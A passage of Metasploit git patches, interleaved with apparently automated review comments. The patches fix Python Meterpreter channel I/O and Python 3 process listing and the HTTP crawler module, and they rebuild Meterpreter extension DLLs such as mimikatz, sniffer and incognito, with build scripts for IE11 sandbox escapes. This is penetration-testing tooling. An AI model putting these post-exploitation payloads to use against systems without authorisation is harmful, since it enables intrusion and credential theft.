self.echo_protection: + end_time = time.time() + 0.5 + out_data = bytes() + while (time.time() < end_time) and (out_data != channel_data): + if self.stdout_reader.is_read_ready(): + out_data = self.stdout_reader.peek(len(channel_data)) + if out_data == channel_data: + self.stdout_reader.read(len(channel_data)) export(STDProcess) class PythonMeterpreter(object): 
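Review bot: The echo-protection loop in `STDProcess.write` is a busy-wait: it polls `stdout_reader.is_read_ready()` with no sleep, so the calling thread spins at full CPU until the echo arrives or the 0.5 second deadline passes. When the child prints something other than an echo of `channel_data`, `out_data` never matches and every write blocks for the whole 0.5 seconds. Yield between polls with `time.sleep(0.01)` at the end of the loop body. The loop should also stop early once `out_data` is as long as `channel_data` and differs from it, `if len(out_data) >= len(channel_data): break`. The magic `0.5` would read better as a named constant with a comment saying what it bounds.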
@@ -310,17 +329,17 @@ class PythonMeterpreter(object): else: channels_for_removal = [] # iterate over the keys because self.channels could be modified if one is closed - channel_ids = self.channels.keys() + channel_ids = list(self.channels.keys()) for channel_id in channel_ids: channel = self.channels[channel_id] - data = '' + data = bytes() if isinstance(channel, STDProcess): if not channel_id in self.interact_channels: continue - if channel.stdout_reader.is_read_ready(): - data = channel.stdout_reader.read() - elif channel.stderr_reader.is_read_ready(): + if channel.stderr_reader.is_read_ready(): data = channel.stderr_reader.read() + elif channel.stdout_reader.is_read_ready(): + data = channel.stdout_reader.read() elif channel.poll() != None: self.handle_dead_resource_channel(channel_id) elif isinstance(channel, MeterpreterSocketClient): @@ -328,7 +347,7 @@ class PythonMeterpreter(object): try: d = channel.recv(1) except socket.error: - d = '' + d = bytes() if len(d) == 0: self.handle_dead_resource_channel(channel_id) break @@ -474,7 +493,7 @@ class PythonMeterpreter(object): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response - channel.stdin.write(channel_data) + channel.write(channel_data) elif isinstance(channel, MeterpreterFile): channel.write(channel_data) elif isinstance(channel, MeterpreterSocket): From 74400549a106f68f1d3e788894dd894641c968f0 Mon Sep 17 00:00:00 2001 From: RageLtMan <rageltman [at] sempervictus> Date: Fri, 30 May 2014 14:39:51 -0400 Subject: [PATCH 436/853] Resolve undefined method `get_cookies' Anemone::Page is not a Rex HTTP request/response, and uses the :cookies method to return an array of cookies. This resolves the method naming error, though it does break with Rex naming convention since Anemone still uses a lot non-Rex methods for working with pages/traffic. --- modules/auxiliary/scanner/http/crawler.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
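Review bot: In the `@@ -310,17 +329,17 @@` hunk of `data/meterpreter/meterpreter.py`, the `if`/`elif` chain still drains only one of the two readers per pass, and the swap just changes which stream can starve the other: a child that keeps `stderr_reader` non-empty now holds back stdout, where before it was the reverse. If both streams feed the same channel payload (the code that sends `data` is outside the hunk, so this is an assumption to confirm), reading both in one pass removes the ordering dependence, e.g. `data = channel.stderr_reader.read() + channel.stdout_reader.read()` with the `channel.poll() != None` check run when `data` is empty. If the new priority is intentional, a one-line comment saying why stderr is read first would save the next reader from swapping it back. The enclosing loop starts and ends outside the hunk.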
diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 0915ee3da3..0b0b34a7ee 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -104,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary info[:ctype] = page.headers['content-type'] end - if !page.get_cookies.empty? - info[:cookie] = page.get_cookies + if !page.cookies.empty? + info[:cookie] = page.cookies end if page.headers['authorization'] From 730ca62089371fdc23467ec8d7c08316c5f20ef3 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Fri, 30 May 2014 14:27:54 -0500 Subject: [PATCH 437/853] Bump to p547 to fix a regression in p545 In my excitement of landing #3281 I didn't check to see if there was a newer Ruby available. Turns out, p547 was released on May 16, and fixes a regression regarding OpenSSL. Announcement: https://www.ruby-lang.org/en/news/2014/05/16/ruby-1-9-3-p547-released/ Sorry about the shuffle. --- .ruby-version | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.ruby-version b/.ruby-version index 671d1fe46c..75bfecd56a 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -1.9.3-p545 +1.9.3-p547 From 77eac38b012baf10e2ffa474abee82e5455a6c24 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 30 May 2014 16:32:03 -0400 Subject: [PATCH 438/853] Pymeterpreter fix processes_via_proc for Python v3 --- data/meterpreter/ext_server_stdapi.py | 4 ++-- modules/payloads/stages/python/meterpreter.rb | 1 - 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 0af3c87a30..ed7e58701a 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py 
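Review bot: In the `crawler.rb` hunk, `info[:cookie]` now receives whatever `Anemone::Page#cookies` returns, which the commit message describes as an array of cookies, so the value stored under `:cookie` changes shape along with the method name. Whatever consumes `info` later in this method (outside the hunk) should be checked for an assumption that the value is a string; if it makes one, the array should be joined or serialised here before it is stored. Since both lines are being touched anyway, the accessor can be called once and the negated `if` dropped: `cookies = page.cookies` followed by `info[:cookie] = cookies unless cookies.empty?`. The enclosing method starts and ends outside the hunk.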
@@ -753,14 +753,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response): def stdapi_sys_process_get_processes_via_ps(request, response): ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command'] proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - ps_output = proc_h.stdout.read() + ps_output = str(proc_h.stdout.read()) ps_output = ps_output.split('\n') ps_output.pop(0) for process in ps_output: process = process.split() if len(process) < 4: break - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, int(process[0])) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1])) pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2]) diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index cb5b286c0b..1862298b82 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -8,7 +8,6 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_python' require 'msf/base/sessions/meterpreter_options' - module Metasploit3 include Msf::Sessions::MeterpreterOptions From d2b8706bd636e63fbaf9d1dd8e1babc68eb77c3c Mon Sep 17 00:00:00 2001 
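Review bot: In the `@@ -753,14 +753,14 @@` hunk of `ext_server_stdapi.py`, `ps_output = str(proc_h.stdout.read())` does not decode on Python 3: `str()` of a bytes object returns its repr (`"b'...'"`) with the newlines as literal backslash-n text, so `ps_output.split('\n')` yields a single element, `ps_output.pop(0)` discards it, and the loop reports no processes. Decoding only when needed keeps Python 2 behaviour unchanged: `ps_output = proc_h.stdout.read()` then `if not isinstance(ps_output, str): ps_output = ps_output.decode('utf-8', 'replace')`. Whether `tlv_pack` accepts the resulting text for `TLV_TYPE_USER_NAME` on Python 3 cannot be seen from this hunk and should be checked alongside the `pgroup = bytes()` change. The changed function is `stdapi_sys_process_get_processes_via_ps` (the hunk header names the preceding `_via_proc` function), and its body continues past the end of the hunk.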
From: OJ <oj@buffered.io> Date: Sat, 31 May 2014 08:12:34 +1000 Subject: [PATCH 439/853] Include meterpreter bins, add Sandbox builds This commit contains the binaries that are needed for Juan's sandbox escape functionality (ie. the updated old libloader code). It also contains rebuilt binaries for all meterpreter plugins. I've also added command line build scripts for the sandbox escapes and added that to the "exploits" build. --- data/meterpreter/elevator.x64.dll | Bin 90624 -> 90624 bytes data/meterpreter/elevator.x86.dll | Bin 78336 -> 78336 bytes data/meterpreter/ext_server_espia.x64.dll | Bin 203776 -> 203776 bytes data/meterpreter/ext_server_espia.x86.dll | Bin 203264 -> 203264 bytes data/meterpreter/ext_server_extapi.x64.dll | Bin 147968 -> 147968 bytes data/meterpreter/ext_server_extapi.x86.dll | Bin 124416 -> 124416 bytes data/meterpreter/ext_server_incognito.x64.dll | Bin 106496 -> 106496 bytes data/meterpreter/ext_server_incognito.x86.dll | Bin 98816 -> 98816 bytes data/meterpreter/ext_server_kiwi.x64.dll | Bin 284160 -> 284160 bytes data/meterpreter/ext_server_kiwi.x86.dll | Bin 245760 -> 245760 bytes .../meterpreter/ext_server_lanattacks.x64.dll | Bin 227840 -> 227840 bytes .../meterpreter/ext_server_lanattacks.x86.dll | Bin 180736 -> 180736 bytes data/meterpreter/ext_server_mimikatz.x64.dll | Bin 541696 -> 541696 bytes data/meterpreter/ext_server_mimikatz.x86.dll | Bin 406528 -> 406528 bytes data/meterpreter/ext_server_priv.x64.dll | Bin 135168 -> 135168 bytes data/meterpreter/ext_server_priv.x86.dll | Bin 114176 -> 114176 bytes data/meterpreter/ext_server_sniffer.x64.dll | Bin 432640 -> 432640 bytes data/meterpreter/ext_server_sniffer.x86.dll | Bin 431616 -> 424960 bytes data/meterpreter/ext_server_stdapi.x64.dll | Bin 411648 -> 411648 bytes data/meterpreter/ext_server_stdapi.x86.dll | Bin 377344 -> 377344 bytes data/meterpreter/metsrv.x64.dll | Bin 972800 -> 972800 bytes data/meterpreter/metsrv.x86.dll | Bin 770048 -> 770048 bytes 
data/meterpreter/screenshot.x64.dll | Bin 202752 -> 202752 bytes data/meterpreter/screenshot.x86.dll | Bin 202752 -> 202752 bytes .../exploits/IE11SandboxEscapes/make.msbuild | 18 ++++++++++++++++++ external/source/exploits/make.bat | 10 ++++++++++ 26 files changed, 28 insertions(+) create mode 100755 external/source/exploits/IE11SandboxEscapes/make.msbuild diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll index 78edbaa6014a8baeb41520905f686c8451c5e946..51a59e0838774e3993437d7a2cfa696922349605 100755 GIT binary patch delta 38 scmZoT!rE|zb;1Yc`Tsg5e)eTPx0|uqnQ^-_BjZ7Rkl1#1L&l#509eEjjQ{`u delta 38 scmZoT!rE|zb;1YcKN<-WKl?J92{1J~Gj4ZgWIU)365Gyh$oSI$04OI82><{9 diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll index 90d0859f3a3ca0d31a38fdc2d5ac089546fbd405..f8c755ae3147a32abd839c62f4f6bcb3a79d27ee 100755 GIT binary patch delta 37 rcmZp8!qV`BWx@~Uz<(VRfBQ07*))4GZueqj^x^;sZJ*A`n5h8(GG`8I delta 37 tcmZp8!qV`BWx@|;7mb98zkQj`_BVSmZueqj^x|N4)=1bsos%(B0{|eN4LJY+ diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll index c0b576e6461fb6a099dbb62a1aa136344a75e411..2595bdaa8ff732a546c1d5196106404fe5a34f59 100755 GIT binary patch delta 41 vcmZqJ!PBsVXTk^O_5V61e)eUmx!UZ+*zUy0xZR17$>}^uczgQ=rb=%Bh-?xM delta 41 vcmZqJ!PBsVXTk?&d(DK2pM9CUwVIt6+npF0w>vR1Ih_XyZ*RZAROt->J8%wJ diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll index 9177e638112c4a82ad2c8ff38b613cf8aae1657f..939cbb2e0fcfb0691af9f5382e2e5b1f12ce3592 100755 GIT binary patch delta 42 ycmZqJ!qc#YX8|K~(!Y+$%#6NF>Cc*j7~6vw8Mg;9G8H{$PW;!g{rD3mOH%+)CJ+t) delta 42 wcmZqJ!qc#YX8|K~yGFufW=3D8M62c?#`Yja#_d6jOhu1D;@giuVX`y@03It1s{jB1 
diff --git a/data/meterpreter/ext_server_extapi.x64.dll b/data/meterpreter/ext_server_extapi.x64.dll index 40bb1cfb9472ded81aa1ad99247d067fb3756fbb..01831d3576e464f2350beda1d01f3b77f0f17cf7 100755 GIT binary patch delta 37 rcmZo@;cRH(T)@cu@?XbfW=228zUCmt?Lmx;hu(pNwu^sYd>IG;5&RFH delta 37 rcmZo@;cRH(T)@aYNi$(GGov5l<K`g7?Lmx;hu(pNwu^sYd>IG;>9-9_ diff --git a/data/meterpreter/ext_server_extapi.x86.dll b/data/meterpreter/ext_server_extapi.x86.dll index 76a23ca691df133ad3a8b023d406f539e6dc3616..a4eefd75066a3bf72f952974159bd7b5e10ccf37 100755 GIT binary patch delta 39 tcmZoT!`^U)eS-ue^TdB0lcgDbnI^1h&SKo2#mKm7DM)O)_;SXVb^tWu58D6$ delta 39 vcmZoT!`^U)eS-ue^L34c$<mCzOs5!{vlzE$F*2@N%6v^DVY~Qp#+P;g6DJM$ diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index bee4ae67da33a51b681bc5de9e5323bfdbe3773a..d919cc4810bba46b9348ead110daf43b093ad30c 100755 GIT binary patch delta 38 scmZoTz}9epZNdxYb^kghzV>BiUdz~Q&A8o~k@03KNNl@!I^#<V07*#@H~;_u delta 38 scmZoTz}9epZNdv?E6s$7uYH+MGBPz=Gj6wLWW1RQ65B4G&iK*-02j#(aR2}S diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index 722c1ace9109aeb9b9be92c67ba9e57f280c9cf0..3dc39f853286a219e8626598ba1536b9e7208e7f 100755 GIT binary patch delta 38 scmZo@VQXk%TfoSi@ULSsGovrl9H!<V#_d6jjF$pIV%yb&8E@(V0Q^x6NdN!< delta 38 rcmZo@VQXk%TfoTNtdTI8nbDVNLRfPU<Mtp%#!G=9vF+-?j5qZF<F5<b diff --git a/data/meterpreter/ext_server_kiwi.x64.dll b/data/meterpreter/ext_server_kiwi.x64.dll index db0da5f462a689c5c7af1d2c35de06e03ce65e46..a95d1c2f32645f2734b953bc3affd0a91ec20653 100755 GIT binary patch delta 48 zcmZozBiOJ;a03S;^Ot`elermvnLBT=G)FVGM>B#j)Anda=A92flH0`}F~2MZ0JR<x A=l}o! delta 48 zcmZozBiOJ;a03S;^BT>B$=r;-%*%CIo1+=qqZvV%X?rvy^Uen#$?f8gm|qqH0Bima A(f|Me 
diff --git a/data/meterpreter/ext_server_kiwi.x86.dll b/data/meterpreter/ext_server_kiwi.x86.dll index 9f6dcba903cb1793159389650f8f42143aceef9e..5348692063509599b42584d72f41e6a4fe199a32 100755 GIT binary patch delta 47 ycmZo@;BRQ)-yp!qJm+7>WMM{MrvHk~NsR4Dj3CUkJ&BR|Q#43!dw4AK$|L}WJP_aj delta 47 ycmZo@;BRQ)-yp!q{6QmOvM{4BQ)pRp5@UN3BM38XPhw>L6b+Kw9v;iQG6?`+1`js? diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll index b9add05503afb0f4568c060f2004434cf3b05cf3..69577b3010f29eca617374e9685d7650c9e1d431 100755 GIT binary patch delta 45 xcmZqp!rSnLcftqeE&n<ue)eVJ=xlakY<FS=VW#a)jLeUuKvLV)WteZq0sy~(5$XT{ delta 45 xcmZqp!rSnLcfto|H_e2JpM9Bb-EDSaY<FS=VW#a)jLeUuKvLV)WteZq0sx}+5IO(= diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index d9d5ab6e14542c065edb989a74d3974211fd7411..0ea7c89b886e227badf78f4c4226eef0903aae03 100755 GIT binary patch delta 41 vcmZo@;cjT*p74V?^<T%t-@Z(|;mux*?Ou$G+r1c>c9nyKx3gC={qz6;SfvmW delta 41 vcmZo@;cjT*p74XYS0iEKZ(k<v)y-av?Ou$G+r1c>c9nyKx3gC={qz6;Kv@pB diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index 784fed7d8e36899d6351389129c6d2b1eb6800e4..85f80e20518a3425691fc4089a26126c937a5310 100755 GIT binary patch delta 92 zcmZqZP;BT>+`z%e{PbVPWNt=ZCb3`5QH<?Tj3CSe#LPg<0>rG_qZrxdsfZbvTbY_$ i85=M_fp21^g0W#cpBmeCJ~ei?c922a!`HH}oCW~C_ZkBL delta 92 zcmZqZP;BT>+`z%e+@_f@nVZp<=~HrZ6k~f7BM37AF*6Xe05R+KC`Pt<Dq@D_R>o#l iMg|N};8;+kU}V|Or^dFOPmSHJ9c0k<@U`qKrvU(2(HD>a 
diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index 2c38fad2b4de1139fed0a855fc0a0fb2b99fcc30..7448559c11f1dd3d4c07a4e2f9ab801a212643ed 100755 GIT binary patch delta 75 zcmZp8A<^(cVgVy_-@lH@%#6NF`=&PsF}4RWf-n;hGj9)KWU0C!WMFP(YG!3%!2krl YiIob*hTHF5Wcl_4q;dQ8ZLFHL0L2{|YXATM delta 75 zcmZp8A<^(cVgV!bX^n)*%#6NF7ymW~F}4RWf-n;hGj9)KWU0C!WN2<>Y;0v{$^Zn8 Y1w{%*mfP=LWcl_4q;dQ8ZLFHL0I5_NUjP6A diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index 5535fe364495ac3a61b7d8fd7f9bb073ceb599af..9c91f1f7e492493415620db4772dd4ba8ab8c224 100755 GIT binary patch delta 37 rcmZozz|pXPW5N&SMgKY`{`O@OUES=(xZR79G3yveX#4i#jGi6<Kba7c delta 37 rcmZozz|pXPW5N$+Zq0;=zkQje{%`hT-0sE5m~{*!w0-+=Mo$j_7>^D< diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index c2f6a4896e52410be99d5a86e1df04371521b50b..266ece2e297a97ae9264f74da5316add25167ebc 100755 GIT binary patch delta 37 rcmZqp!`ASJZNdlUkbfN$Kl?I$7j1T8-0sB4c&QO2v|YTJ@ud|2Po5B` delta 37 rcmZqp!`ASJZNdlUV2y-{pM9AYXEr-AZg*m2ywnI1+AiMA_|gghEV~Y= 
diff --git a/data/meterpreter/ext_server_sniffer.x64.dll b/data/meterpreter/ext_server_sniffer.x64.dll index 75b7a50a328606007eaa9253c2920bc4e0f051ff..3a36b5bf813d8dab156ec129c92c5a9c21e3a4eb 100755 GIT binary patch delta 66019 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 